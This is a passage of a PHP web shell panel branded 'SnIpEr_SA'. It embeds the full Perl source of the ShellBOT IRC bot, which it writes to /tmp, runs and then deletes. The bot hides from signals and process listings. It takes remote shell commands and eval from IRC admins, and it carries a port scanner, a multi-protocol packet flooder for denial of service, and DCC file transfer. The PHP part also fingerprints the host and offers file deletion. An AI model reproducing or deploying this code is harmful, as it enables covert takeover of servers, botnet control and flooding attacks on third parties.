3020 my \$VERSAO = '0.2';
3021 \$SIG{'INT'} = 'IGNORE';
3022 \$SIG{'HUP'} = 'IGNORE';
3023 \$SIG{'TERM'} = 'IGNORE';
3024 \$SIG{'CHLD'} = 'IGNORE';
3025 \$SIG{'PS'} = 'IGNORE';
3026 \$SIG{'STOP'} = 'IGNORE';
3027 use IO::Socket;
3028 use Socket;
3029 use IO::Select;
3030 chdir(\"/\");
3031 \$servidor=\"\$ARGV[0]\" if \$ARGV[0];
3032 $0=\"\$processo\".\"&#92;&#48;\"x16;;
3033 my \$pid=fork;
3034 exit if \$pid;
3035 die \"Problema com o fork: $!\" unless defined(\$pid);
3036 my \$dcc_sel = new IO::Select->new();
3037 
3038 ###
3039 ###
3040 ###
3041 ###
3042 ###
3043 ###
3044 ###
3045 ###
3046 ###
3047 ###
3048 ###
3049 ###
3050 ###
3051 ####
3052 # B0tchZ na veia ehehe <img src="/wp-includes/images/smilies/icon_razz.gif" alt=":P" class="wp-smiley" /> #
3053 
3054 ###
3055 ###
3056 ###
3057 ###
3058 ###
3059 ###
3060 ###
3061 ###
3062 ###
3063 ###
3064 ###
3065 ###
3066 ###
3067 ####
3068 \$sel_cliente = IO::Select->new();
3069 sub sendraw {
3070   if ($#_ == '1') {
3071     my \$socket = \$_[0];
3072     print \$socket \"\$_[1]\\n\";
3073   } else {
3074       print \$IRC_cur_socket \"\$_[0]\\n\";
3075   }
3076 }
3077 
3078 ###
3079 ###
3080 ###
3081 ###
3082 ###
3083 ###
3084 ###
3085 ###
3086 ###
3087 ###
3088 ###
3089 ###
3090 ###
3091 ###
3092 ###
3093 ####
3094 sub conectar {
3095    my \$meunick = \$_[0];
3096    my \$servidor_con = \$_[1];
3097    my \$porta_con = \$_[2];
3098    my \$IRC_socket = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"\$servidor_con\", PeerPort=>\$porta_con) or return(1);
3099    if (defined(\$IRC_socket)) {
3100      \$IRC_cur_socket = \$IRC_socket;
3101      \$IRC_socket->autoflush(1);
3102      \$sel_cliente->add(\$IRC_socket);
3103      \$irc_servers{\$IRC_cur_socket}{'host'} = \"\$servidor_con\";
3104      \$irc_servers{\$IRC_cur_socket}{'porta'} = \"\$porta_con\";
3105      \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick;
3106      \$irc_servers{\$IRC_cur_socket}{'meuip'} = \$IRC_socket->sockhost;
3107      nick(\"\$meunick\");
3108      sendraw(\"USER \$ircname \".\$IRC_socket->sockhost.\" \$servidor_con :\$realname\");
3109      sleep 1;
3110    }
3111 } 
3112 ###
3113 ###
3114 ###
3115 ###
3116 ###
3117 ###
3118 ###
3119 ###
3120 ###
3121 ####
3122 my \$line_temp;
3123 while( 1 ) {
3124    while (!(keys(%irc_servers))) { conectar(\"\$nick\", \"\$servidor\", \"\$porta\"); }
3125    delete(\$irc_servers{''}) if (defined(\$irc_servers{''}));
3126    &DCC::connections;
3127    my @ready = \$sel_cliente->can_read(0);
3128    next unless(@ready);
3129    foreach \$fh (@ready) {
3130      \$IRC_cur_socket = \$fh;
3131      \$meunick = \$irc_servers{\$IRC_cur_socket}{'nick'};
3132      \$nread = sysread(\$fh, \$msg, 4096);
3133      if (\$nread == 0) {
3134         \$sel_cliente->remove(\$fh);
3135         \$fh->close;
3136         delete(\$irc_servers{\$fh});
3137      }
3138      @lines = split (/\\n/, \$msg);
3139      for(my \$c=0; \$c<= $#lines; \$c++) {
3140        \$line = \$lines[\$c];
3141        \$line=\$line_temp.\$line if (\$line_temp);
3142        \$line_temp='';
3143        \$line =~ s/\\r$//;
3144        unless (\$c == $#lines) {
3145          parse(\"\$line\");
3146        } else {
3147            if ($#lines == 0) {
3148              parse(\"\$line\");
3149            } elsif (\$lines[\$c] =~ /\\r$/) {
3150                parse(\"\$line\");
3151            } elsif (\$line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
3152                parse(\"\$line\");
3153            } else {
3154                \$line_temp = \$line;
3155            }
3156        }
3157       }
3158    }
3159 }
3160 
3161 ###
3162 ###
3163 ###
3164 ###
3165 ###
3166 ###
3167 ###
3168 ###
3169 ###
3170 ###
3171 ###
3172 ####
3173 
3174 sub parse {
3175    my \$servarg = shift;
3176    if (\$servarg =~ /^PING \:(.*)/) {
3177      sendraw(\"PONG :$1\");
3178    } elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
3179        my \$pn=$1; my \$onde = $4; my \$args = $5;
3180        if (\$args =~ /^\&#92;&#48;01VERSION\&#92;&#48;01$/) {
3181          notice(\"\$pn\", \"\&#92;&#48;01VERSION ShellBOT-\$VERSAO por 0ldW0lf\&#92;&#48;01\");
3182        }
3183        if (grep {\$_ =~ /^\Q\$pn\E$/i } @adms) {
3184          if (\$onde eq \"\$meunick\"){
3185            shell(\"\$pn\", \"\$args\");
3186          }
3187          if (\$args =~ /^(\Q\$meunick\E|\!atrix)\s+(.*)/ ) {
3188             my \$natrix = $1;
3189             my \$arg = $2;
3190             if (\$arg =~ /^\!(.*)/) {
3191               ircase(\"\$pn\",\"\$onde\",\"\$1\") unless (\$natrix eq \"!atrix\" and \$arg =~ /^\!nick/);
3192             } elsif (\$arg =~ /^\@(.*)/) {
3193                 \$ondep = \$onde;
3194                 \$ondep = \$pn if \$onde eq \$meunick;
3195                 bfunc(\"\$ondep\",\"$1\");
3196             } else {
3197                 shell(\"\$onde\", \"\$arg\");
3198             }
3199          }
3200        }
3201    } elsif (\$servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
3202        if (lc($1) eq lc(\$meunick)) {
3203          \$meunick=$4;
3204          \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick;
3205        }
3206    } elsif (\$servarg =~ m/^\:(.+?)\s+433/i) {
3207        nick(\"\$meunick\".int rand(9999));
3208    } elsif (\$servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
3209        \$meunick = $2;
3210        \$irc_servers{\$IRC_cur_socket}{'nick'} = \$meunick;
3211        \$irc_servers{\$IRC_cur_socket}{'nome'} = \"$1\";
3212        foreach my \$canal (@canais) {
3213          sendraw(\"JOIN \$canal\");
3214        }
3215    }
3216 }
3217 
3218 ###
3219 ###
3220 ###
3221 ###
3222 ###
3223 ###
3224 ###
3225 ###
3226 ###
3227 ###
3228 ###
3229 ###
3230 ###
3231 sub bfunc {
3232   my \$printl = \$_[0];
3233   my \$funcarg = \$_[1];
3234   if (my \$pid = fork) {
3235      waitpid(\$pid, 0);
3236   } else {
3237       if (fork) {
3238          exit;
3239        } else {
3240            if (\$funcarg =~ /^portscan (.*)/) {
3241              my \$hostip=\"$1\";
3242              my @portas=(\"21\",\"22\",\"23\",\"25\",\"53\",\"80\",\"110\",\"143\");
3243              my (@aberta, %porta_banner);
3244              foreach my \$porta (@portas) {
3245                 my \$scansock = IO::Socket::INET->new(PeerAddr => \$hostip, PeerPort => \$porta, Proto => 'tcp', Timeout => 4);
3246                 if (\$scansock) {
3247                    push (@aberta, \$porta);
3248                    \$scansock->close;
3249                 }
3250              }
3251              if (@aberta) {
3252                sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :portas abertas: @aberta\");
3253              } else {
3254                  sendraw(\$IRC_cur_socket,\"PRIVMSG \$printl :Nenhuma porta aberta foi encontrada\");
3255              }
3256            }
3257            if (\$funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
3258              my (\$dtime, %pacotes) = attacker(\"$1\", \"$2\", \"$3\");
3259              \$dtime = 1 if \$dtime == 0;
3260              my %bytes;
3261              \$bytes{igmp} = $2 * \$pacotes{igmp};
3262              \$bytes{icmp} = $2 * \$pacotes{icmp};
3263              \$bytes{o} = $2 * \$pacotes{o};
3264              \$bytes{udp} = $2 * \$pacotes{udp};
3265              \$bytes{tcp} = $2 * \$pacotes{tcp};
3266              sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\&#92;&#48;02 - Status GERAL -\&#92;&#48;02\");
3267              sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\&#92;&#48;02Tempo\&#92;&#48;02: \$dtime\".\"s\");
3268              sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\&#92;&#48;02Total pacotes\&#92;&#48;02: \".(\$pacotes{udp} + \$pacotes{igmp} + \$pacotes{icmp} + \$pacotes{o}));
3269              sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\&#92;&#48;02Total bytes\&#92;&#48;02: \".(\$bytes{icmp} + \$bytes {igmp} + \$bytes{udp} + \$bytes{o}));
3270              sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\&#92;&#48;02Média de envio\&#92;&#48;02: \".int(((\$bytes{icmp}+\$bytes{igmp}+\$bytes{udp} + \$bytes{o})/1024)/\$dtime).\" kbps\");
3271            }
3272            exit;
3273        }
3274   }
3275 }
3276 
3277 ###
3278 ###
3279 ###
3280 ###
3281 ###
3282 ###
3283 ###
3284 ###
3285 ###
3286 ###
3287 ###
3288 ###
3289 ###
3290 
3291 sub ircase {
3292   my (\$kem, \$printl, \$case) = @_;
3293 
3294   if (\$case =~ /^join (.*)/) {
3295      j(\"$1\");
3296    }
3297    if (\$case =~ /^part (.*)/) {
3298       p(\"$1\");
3299    }
3300    if (\$case =~ /^rejoin\s+(.*)/) {
3301       my \$chan = $1;
3302       if (\$chan =~ /^(\d+) (.*)/) {
3303         for (my \$ca = 1; \$ca <= $1; \$ca++ ) {
3304           p(\"$2\");
3305           j(\"$2\");
3306         }
3307       } else {
3308           p(\"\$chan\");
3309           j(\"\$chan\");
3310       }
3311    }
3312    if (\$case =~ /^op/) {
3313       op(\"\$printl\", \"\$kem\") if \$case eq \"op\";
3314       my \$oarg = substr(\$case, 3);
3315       op(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
3316    }
3317    if (\$case =~ /^deop/) {
3318       deop(\"\$printl\", \"\$kem\") if \$case eq \"deop\";
3319       my \$oarg = substr(\$case, 5);
3320       deop(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
3321    }
3322    if (\$case =~ /^voice/) {
3323       voice(\"\$printl\", \"\$kem\") if \$case eq \"voice\";
3324       \$oarg = substr(\$case, 6);
3325       voice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
3326    }
3327    if (\$case =~ /^devoice/) {
3328       devoice(\"\$printl\", \"\$kem\") if \$case eq \"devoice\";
3329       \$oarg = substr(\$case, 8);
3330       devoice(\"$1\", \"$2\") if (\$oarg =~ /(\S+)\s+(\S+)/);
3331    }
3332    if (\$case =~ /^msg\s+(\S+) (.*)/) {
3333       msg(\"$1\", \"$2\");
3334    }
3335    if (\$case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
3336       for (my \$cf = 1; \$cf <= $1; \$cf++) {
3337         msg(\"$2\", \"$3\");
3338       }
3339    }
3340    if (\$case =~ /^ctcp\s+(\S+) (.*)/) {
3341       ctcp(\"$1\", \"$2\");
3342    }
3343    if (\$case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
3344       for (my \$cf = 1; \$cf <= $1; \$cf++) {
3345         ctcp(\"$2\", \"$3\");
3346       }
3347    }
3348    if (\$case =~ /^invite\s+(\S+) (.*)/) {
3349       invite(\"$1\", \"$2\");
3350    }
3351    if (\$case =~ /^nick (.*)/) {
3352       nick(\"$1\");
3353    }
3354    if (\$case =~ /^conecta\s+(\S+)\s+(\S+)/) {
3355        conectar(\"$2\", \"$1\", 6667);
3356    }
3357    if (\$case =~ /^send\s+(\S+)\s+(\S+)/) {
3358       DCC::SEND(\"$1\", \"$2\");
3359    }
3360    if (\$case =~ /^raw (.*)/) {
3361       sendraw(\"$1\");
3362    }
3363    if (\$case =~ /^eval (.*)/) {
3364      eval \"$1\";
3365    }
3366 }
3367 
3368 ###
3369 ###
3370 ###
3371 ###
3372 ###
3373 ###
3374 ###
3375 ###
3376 ###
3377 ###
3378 ###
3379 ###
3380 ###
3381 sub shell {
3382   return unless \$secv;
3383   my \$printl=\$_[0];
3384   my \$comando=\$_[1];
3385   if (\$comando =~ /cd (.*)/) {
3386     chdir(\"$1\") || msg(\"\$printl\", \"Dossier Makayench <img src="/wp-includes/images/smilies/icon_biggrin.gif" alt=":D" class="wp-smiley" /> \");
3387     return;
3388   }
3389   elsif (\$pid = fork) {
3390      waitpid(\$pid, 0);
3391   } else {
3392       if (fork) {
3393          exit;
3394        } else {
3395            my @resp=`\$comando 2>&1 3>&1`;
3396            my \$c=0;
3397            foreach my \$linha (@resp) {
3398              \$c++;
3399              chop \$linha;
3400              sendraw(\$IRC_cur_socket, \"PRIVMSG \$printl :\$linha\");
3401              if (\$c == \"\$linas_max\") {
3402                \$c=0;
3403                sleep \$sleep;
3404              }
3405            }
3406            exit;
3407        }
3408   }
3409 }
3410 #eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
3411 sub attacker {
3412   my \$iaddr = inet_aton(\$_[0]);
3413   my \$msg = 'B' x \$_[1];
3414   my \$ftime = \$_[2];
3415   my \$cp = 0;
3416   my (%pacotes);
3417   \$pacotes{icmp} = \$pacotes{igmp} = \$pacotes{udp} = \$pacotes{o} = \$pacotes{tcp} = 0;
3418   socket(SOCK1, PF_INET, SOCK_RAW, 2) or \$cp++;
3419   socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or \$cp++;
3420   socket(SOCK3, PF_INET, SOCK_RAW, 1) or \$cp++;
3421   socket(SOCK4, PF_INET, SOCK_RAW, 6) or \$cp++;
3422   return(undef) if \$cp == 4;
3423   my \$itime = time;
3424   my (\$cur_time);
3425   while ( 1 ) {
3426      for (my \$porta = 1; \$porta <= 65535; \$porta++) {
3427        \$cur_time = time - \$itime;
3428        last if \$cur_time >= \$ftime;
3429        send(SOCK1, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{igmp}++;
3430        send(SOCK2, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{udp}++;
3431        send(SOCK3, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{icmp}++;
3432        send(SOCK4, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{tcp}++;
3433        # DoS ?? <img src="/wp-includes/images/smilies/icon_razz.gif" alt=":P" class="wp-smiley" />
3434        for (my \$pc = 3; \$pc <= 255;\$pc++) {
3435          next if \$pc == 6;
3436          \$cur_time = time - \$itime;
3437          last if \$cur_time >= \$ftime;
3438          socket(SOCK5, PF_INET, SOCK_RAW, \$pc) or next;
3439          send(SOCK5, \$msg, 0, sockaddr_in(\$porta, \$iaddr)) and \$pacotes{o}++;;
3440        }
3441      }
3442      last if \$cur_time >= \$ftime;
3443   }
3444   return(\$cur_time, %pacotes);
3445 }
3446 
3447 ###
3448 ###
3449 ###
3450 ###
3451 ###
3452 ####
3453 # ALIASES #
3454 
3455 ###
3456 ###
3457 ###
3458 ###
3459 ###
3460 ####
3461 sub action {
3462    return unless $#_ == 1;
3463    sendraw(\"PRIVMSG \$_[0] :\&#92;&#48;01ACTION \$_[1]\&#92;&#48;01\");
3464 }
3465 sub ctcp {
3466    return unless $#_ == 1;
3467    sendraw(\"PRIVMSG \$_[0] :\&#92;&#48;01\$_[1]\&#92;&#48;01\");
3468 }
3469 sub msg {
3470    return unless $#_ == 1;
3471    sendraw(\"PRIVMSG \$_[0] :\$_[1]\");
3472 }
3473 sub notice {
3474    return unless $#_ == 1;
3475    sendraw(\"NOTICE \$_[0] :\$_[1]\");
3476 }
3477 sub op {
3478    return unless $#_ == 1;
3479    sendraw(\"MODE \$_[0] +o \$_[1]\");
3480 }
3481 sub deop {
3482    return unless $#_ == 1;
3483    sendraw(\"MODE \$_[0] -o \$_[1]\");
3484 }
3485 sub hop {
3486     return unless $#_ == 1;
3487    sendraw(\"MODE \$_[0] +h \$_[1]\");
3488 }
3489 sub dehop {
3490    return unless $#_ == 1;
3491    sendraw(\"MODE \$_[0] +h \$_[1]\");
3492 }
3493 sub voice {
3494    return unless $#_ == 1;
3495    sendraw(\"MODE \$_[0] +v \$_[1]\");
3496 }
3497 sub devoice {
3498    return unless $#_ == 1;
3499    sendraw(\"MODE \$_[0] -v \$_[1]\");
3500 }
3501 sub ban {
3502    return unless $#_ == 1;
3503    sendraw(\"MODE \$_[0] +b \$_[1]\");
3504 }
3505 sub unban {
3506    return unless $#_ == 1;
3507    sendraw(\"MODE \$_[0] -b \$_[1]\");
3508 }
3509 sub kick {
3510    return unless $#_ == 1;
3511    sendraw(\"KICK \$_[0] \$_[1] :\$_[2]\");
3512 }
3513 sub modo {
3514    return unless $#_ == 0;
3515    sendraw(\"MODE \$_[0] \$_[1]\");
3516 }
3517 sub mode { modo(@_); }
3518 sub j { &join(@_); }
3519 sub join {
3520    return unless $#_ == 0;
3521    sendraw(\"JOIN \$_[0]\");
3522 }
3523 sub p { part(@_); }
3524 sub part {sendraw(\"PART \$_[0]\");}
3525 sub nick {
3526   return unless $#_ == 0;
3527   sendraw(\"NICK \$_[0]\");
3528 }
3529 sub invite {
3530    return unless $#_ == 1;
3531    sendraw(\"INVITE \$_[1] \$_[0]\");
3532 }
3533 sub topico {
3534    return unless $#_ == 1;
3535    sendraw(\"TOPIC \$_[0] \$_[1]\");
3536 }
3537 sub topic { topico(@_); }
3538 sub whois {
3539   return unless $#_ == 0;
3540   sendraw(\"WHOIS \$_[0]\");
3541 }
3542 sub who {
3543   return unless $#_ == 0;
3544   sendraw(\"WHO \$_[0]\");
3545 }
3546 sub names {
3547   return unless $#_ == 0;
3548   sendraw(\"NAMES \$_[0]\");
3549 }
3550 sub away {
3551   sendraw(\"AWAY \$_[0]\");
3552 }
3553 sub back { away(); }
3554 sub quit {
3555   sendraw(\"QUIT :\$_[0]\");
3556 }
3557 # DCC
3558 
3559 ###
3560 ###
3561 ###
3562 ###
3563 ###
3564 ###
3565 ###
3566 ###
3567 ###
3568 ###
3569 ###
3570 ####
3571 package DCC;
3572 sub connections {
3573    my @ready = \$dcc_sel->can_read(1);
3574 # return unless (@ready);
3575    foreach my \$fh (@ready) {
3576      my \$dcctipo = \$DCC{\$fh}{tipo};
3577      my \$arquivo = \$DCC{\$fh}{arquivo};
3578      my \$bytes = \$DCC{\$fh}{bytes};
3579      my \$cur_byte = \$DCC{\$fh}{curbyte};
3580      my \$nick = \$DCC{\$fh}{nick};
3581 
3582      my \$msg;
3583      my \$nread = sysread(\$fh, \$msg, 10240);
3584      if (\$nread == 0 and \$dcctipo =~ /^(get|sendcon)$/) {
3585         \$DCC{\$fh}{status} = \"Cancelado\";
3586         \$DCC{\$fh}{ftime} = time;
3587         \$dcc_sel->remove(\$fh);
3588         \$fh->close;
3589         next;
3590      }
3591      if (\$dcctipo eq \"get\") {
3592         \$DCC{\$fh}{curbyte} += length(\$msg);
3593         my \$cur_byte = \$DCC{\$fh}{curbyte};
3594         open(FILE, \">> \$arquivo\");
3595         print FILE \"\$msg\" if (\$cur_byte <= \$bytes);
3596         close(FILE);
3597         my \$packbyte = pack(\"N\", \$cur_byte);
3598         print \$fh \"\$packbyte\";
3599 
3600         if (\$bytes == \$cur_byte) {
3601            \$dcc_sel->remove(\$fh);
3602            \$fh->close;
3603            \$DCC{\$fh}{status} = \"Recebido\";
3604            \$DCC{\$fh}{ftime} = time;
3605            next;
3606         }
3607      } elsif (\$dcctipo eq \"send\") {
3608           my \$send = \$fh->accept;
3609           \$send->autoflush(1);
3610           \$dcc_sel->add(\$send);
3611           \$dcc_sel->remove(\$fh);
3612           \$DCC{\$send}{tipo} = 'sendcon';
3613           \$DCC{\$send}{itime} = time;
3614           \$DCC{\$send}{nick} = \$nick;
3615           \$DCC{\$send}{bytes} = \$bytes;
3616           \$DCC{\$send}{curbyte} = 0;
3617           \$DCC{\$send}{arquivo} = \$arquivo;
3618           \$DCC{\$send}{ip} = \$send->peerhost;
3619           \$DCC{\$send}{porta} = \$send->peerport;
3620           \$DCC{\$send}{status} = \"Enviando\";
3621           #de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
3622           open(FILE, \"< \$arquivo\");
3623           my \$fbytes;
3624           read(FILE, \$fbytes, 1024);
3625           print \$send \"\$fbytes\";
3626           close FILE;
3627 # delete(\$DCC{\$fh});
3628 } elsif (\$dcctipo eq 'sendcon') {
3629           my \$bytes_sended = unpack(\"N\", \$msg);
3630           \$DCC{\$fh}{curbyte} = \$bytes_sended;
3631           if (\$bytes_sended == \$bytes) {
3632              \$fh->close;
3633              \$dcc_sel->remove(\$fh);
3634              \$DCC{\$fh}{status} = \"Enviado\";
3635              \$DCC{\$fh}{ftime} = time;
3636              next;
3637           }
3638           open(SENDFILE, \"< \$arquivo\");
3639           seek(SENDFILE, \$bytes_sended, 0);
3640           my \$send_bytes;
3641           read(SENDFILE, \$send_bytes, 1024);
3642           print \$fh \"\$send_bytes\";
3643           close(SENDFILE);
3644      }
3645    }
3646 }
3647 
3648 ###
3649 ###
3650 ###
3651 ###
3652 ###
3653 ###
3654 ###
3655 ###
3656 ###
3657 ###
3658 ###
3659 ###
3660 ###
3661 sub SEND {
3662   my (\$nick, \$arquivo) = @_;
3663   unless (-r \"\$arquivo\") {
3664     return(0);
3665   }
3666   my \$dccark = \$arquivo;
3667   \$dccark =~ s/[.*\/](\S+)/$1/;
3668   my \$meuip = $::irc_servers{\"$::IRC_cur_socket\"}{'meuip'};
3669   my \$longip = unpack(\"N\",inet_aton(\$meuip));
3670   my @filestat = stat(\$arquivo);
3671   my \$size_total=\$filestat[7];
3672   if (\$size_total == 0) {
3673      return(0);
3674   }
3675   my (\$porta, \$sendsock);
3676   do {
3677     \$porta = int rand(64511);
3678     \$porta += 1024;
3679     \$sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>\$porta, Proto => 'tcp') and \$dcc_sel->add(\$sendsock);
3680   } until \$sendsock;
3681   \$DCC{\$sendsock}{tipo} = 'send';
3682   \$DCC{\$sendsock}{nick} = \$nick;
3683   \$DCC{\$sendsock}{bytes} = \$size_total;
3684   \$DCC{\$sendsock}{arquivo} = \$arquivo;
3685   &::ctcp(\"\$nick\", \"DCC SEND \$dccark \$longip \$porta \$size_total\");
3686 }
3687 sub GET {
3688   my (\$arquivo, \$dcclongip, \$dccporta, \$bytes, \$nick) = @_;
3689   return(0) if (-e \"\$arquivo\");
3690   if (open(FILE, \"> \$arquivo\")) {
3691      close FILE;
3692   } else {
3693     return(0);
3694   }
3695   my \$dccip=fixaddr(\$dcclongip);
3696   return(0) if (\$dccporta < 1024 or not defined \$dccip or \$bytes < 1);
3697   my \$dccsock = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\$dccip, PeerPort=>\$dccporta, Timeout=>15) or return (0);
3698   \$dccsock->autoflush(1);
3699   \$dcc_sel->add(\$dccsock);
3700   \$DCC{\$dccsock}{tipo} = 'get';
3701   \$DCC{\$dccsock}{itime} = time;
3702   \$DCC{\$dccsock}{nick} = \$nick;
3703   \$DCC{\$dccsock}{bytes} = \$bytes;
3704   \$DCC{\$dccsock}{curbyte} = 0;
3705   \$DCC{\$dccsock}{arquivo} = \$arquivo;
3706   \$DCC{\$dccsock}{ip} = \$dccip;
3707   \$DCC{\$dccsock}{porta} = \$dccporta;
3708   \$DCC{\$dccsock}{status} = \"Recebendo\";
3709 }
3710 
3711 ###
3712 ###
3713 ###
3714 ###
3715 ###
3716 ###
3717 ###
3718 ###
3719 ###
3720 ###
3721 ###
3722 ###
3723 ###
3724 ###
3725 # po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
3726 sub Status {
3727   my \$socket = shift;
3728   my \$sock_tipo = \$DCC{\$socket}{tipo};
3729   unless (lc(\$sock_tipo) eq \"chat\") {
3730     my \$nick = \$DCC{\$socket}{nick};
3731     my \$arquivo = \$DCC{\$socket}{arquivo};
3732     my \$itime = \$DCC{\$socket}{itime};
3733     my \$ftime = time;
3734     my \$status = \$DCC{\$socket}{status};
3735     \$ftime = \$DCC{\$socket}{ftime} if defined(\$DCC{\$socket}{ftime});
3736     my \$d_time = \$ftime-\$itime;
3737     my \$cur_byte = \$DCC{\$socket}{curbyte};
3738     my \$bytes_total = \$DCC{\$socket}{bytes};
3739     my \$rate = 0;
3740     \$rate = (\$cur_byte/1024)/\$d_time if \$cur_byte > 0;
3741     my \$porcen = (\$cur_byte*100)/\$bytes_total;
3742     my (\$r_duv, \$p_duv);
3743     if (\$rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
3744        \$r_duv = $3; \$r_duv++ if $4 >= 5;
3745        \$rate = \"$1\.$2\".\"\$r_duv\";
3746     }
3747     if (\$porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
3748        \$p_duv = $3; \$p_duv++ if $4 >= 5;
3749        \$porcen = \"$1\.$2\".\"\$p_duv\";
3750     }
3751     return(\"\$sock_tipo\",\"\$status\",\"\$nick\",\"\$arquivo\",\"\$bytes_total\", \"\$cur_byte\",\"\$d_time\", \"\$rate\", \"\$porcen\");
3752   }
3753   return(0);
3754 }
3755 # esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
3756 sub fixaddr {
3757     my (\$address) = @_;
3758     chomp \$address; # just in case, sigh.
3759     if (\$address =~ /^\d+$/) {
3760         return inet_ntoa(pack \"N\", \$address);
3761     } elsif (\$address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
3762         return \$address;
3763     } elsif (\$address =~ tr/a-zA-Z//) { # Whee! Obfuscation!
3764         return inet_ntoa(((gethostbyname(\$address))[4])[0]);
3765     } else {
3766         return;
3767     }
3768 }
3769 
3770 ###
3771 ###
3772 ###
3773 ###
3774 ###
3775 ###
3776 ###
3777 ###
3778 ###
3779 ###
3780 ###
3781 ###
3782 ###
3783 ###
3784 ";
3785 $bot = "/tmp/ircs.pl";
3786 $open = fopen($bot,"w");
3787 fputs($open,$file);
3788 fclose($open);
3789 $cmd="perl $bot";
3790 $cmd2="rm $bot";
3791 system($cmd);
3792 system($cmd2);
3793 $_POST['cmd']="echo \"Now script try connect to ircserver ...\"";
3794 }
3795 if($unix)
3796  {
3797  if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
3798  if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
3799  if($safe_mode) { $sysctl = '-'; }
3800  else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
3801  else
3802   {
3803    $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
3804    if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
3805    if(empty($sysctl)) { $sysctl = '-'; }
3806    setcookie('sysctl',$sysctl);
3807   }
3808  }
3809 echo $head;
3810 echo '</head>';
3811 if(empty($_POST['cmd'])) {
3812 $serv = array(127,192,172,10);
3813 $addr=@explode('.', $_SERVER['SERVER_ADDR']);
3814 $current_version = str_replace('.','',$version);
3815 if (!in_array($addr[0], $serv)) {
3816 @print "<img src=\"http://127.0.0.1/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
3817 @readfile ("http://127.0.0.1/version.php?version=".$current_version."");}}
3818 echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#CCCCCC><tr><td bgcolor=#000000 width=160><font face=Comic Sans MS size=4>'.ws(2).'<DIV dir=ltr align=center><font face=Wingdings size=3><b>N</b></font><b>'.ws(2).'<DIV dir=ltr align=center><SPAN
3819 style="FILTER: blur(add=1,direction=10,strength=25); HEIGHT: 25px">
3820 <SPAN
3821 style="FONT-SIZE: 15pt; COLOR: white; FONT-FAMILY: Impact">SnIpEr_SA</P></SPAN></DIV></font></b></font></td><td bgcolor=#000000><font face=tahoma size=1>';
3822 echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
3823 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."? title=\"".$lang[$language.'_text46']."\"><b>????????</b></a> ".$rb;
3824 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?sqlman title=\"".$lang[$language.'_text46']."\"><b>SQL</b></a> ".$rb;
3825 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
3826 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
3827 if($unix)
3828  {
3829  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
3830  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
3831  echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb;
3832  }
3833 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
3834 echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
3835 echo ws(2)."????? ?????: <b>";
3836 echo (($safe_mode)?("<font color=#008000>????</font>"):("<font color=red>??? ????</font>"));
3837 echo "</b>".ws(2);
